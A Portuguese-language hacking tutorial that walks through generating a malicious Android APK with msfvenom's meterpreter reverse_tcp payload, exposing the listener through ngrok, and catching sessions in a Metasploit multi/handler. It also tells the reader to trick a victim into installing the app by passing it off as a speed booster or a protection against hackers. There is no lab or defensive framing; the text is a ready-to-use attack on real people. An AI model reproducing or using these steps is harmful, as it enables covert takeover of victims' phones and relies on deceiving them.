





Requisitos:

- 1 ~> Ngrok instalado
- 2 ~> Metasploit-Framework instalado

Tutorial:

Primeiramente abra uma seção e execute o seguinte comando:

```
$ ./ngrok tcp 4444
```

Tudo ok!, abra uma nova seção e crie um aplicativo malicioso com o MsfVenom, digite o seguinte comando:

```
$ msfvenom -p android/meterpreter/reverse_tcp  
LHOST=(Volte na aba do ngrok e digite o Ip dele aqui) LPORT=4444 --platform android R -  
o /sdcard/(Nome do Apk).apk
```

Agora que você já tem sua payload, vá no seu gerenciador de arquivos e procure seu aplicativo ele vai estar no diretório principal do seu dispositivo.

Agora sua Engenharia Social vai entrar em cena!, convença a sua vítima a instalar o aplicativo, invente alguma coisa, diga que ele serve pra deixar o celular mais rápido, ou até mesmo que ele protege de hackers.

Depois da vítima ter instalado o apk, inicie o Metasploit-Framework...

```
$ msfconsole
```



Depois de iniciar iremos configurar o apk malicioso usando o HANDLER, digite o seguinte:

```
$ use exploit/multi/handler
```

Vamos usar o Meterpreter para configurar a conexão reversa com o aplicativo.

```
$ set payload android/meterpreter/reverse_tcp
```

Agora vamos configurar o IP e a Porta de conexão com a Payload.

```
$ set LHOST 127.0.0.1  
$ set LPORT 4444  
$ show options  
$ set ExitOnSession false
```

Feito tudo isso, iremos executar HANDLER para fazer a conexão reversa com a vítima usaremos o seguinte comando:

```
$ exploit -j
```

Vamos listar as seções ativas:

```
$ sessions
```

Que tal entra em uma delas?:

```
$ sessions -i (ID DA SEÇÃO)
```

Dúvidas de quais comandos usar na vítima?:

```
$ help
```

By: Cybe®Bot\_13

Hacking World